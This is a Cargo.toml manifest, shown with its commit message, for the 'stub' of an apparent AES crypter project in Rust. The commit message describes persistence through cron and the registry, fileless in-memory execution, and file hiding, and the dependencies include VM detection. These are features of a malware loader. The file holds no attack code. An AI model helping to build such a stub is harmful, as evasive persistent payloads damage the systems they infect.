AES-Encrypter-Rust/stub/Cargo.toml
JorySeverijnse e8c22a8160 Add cross-platform support for Linux and Windows
- Implement conditional compilation for platform-specific dependencies
- Add Linux persistence via cron jobs as alternative to Windows registry
- Create cross-platform fileless execution (memexec for Windows, temp file + exec for Linux)
- Support platform-specific paths and file hiding mechanisms
- Maintain full Windows compatibility while adding Linux support
2025-12-14 12:10:49 +01:00

18 lines
324 B
TOML

[package]
name = "stub"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
inside-vm = "0.2.0"
aes = "0.8.2"
[target.'cfg(windows)'.dependencies]
memexec = "0.2"
winreg = "0.9"
[target.'cfg(unix)'.dependencies]
libc = "0.2"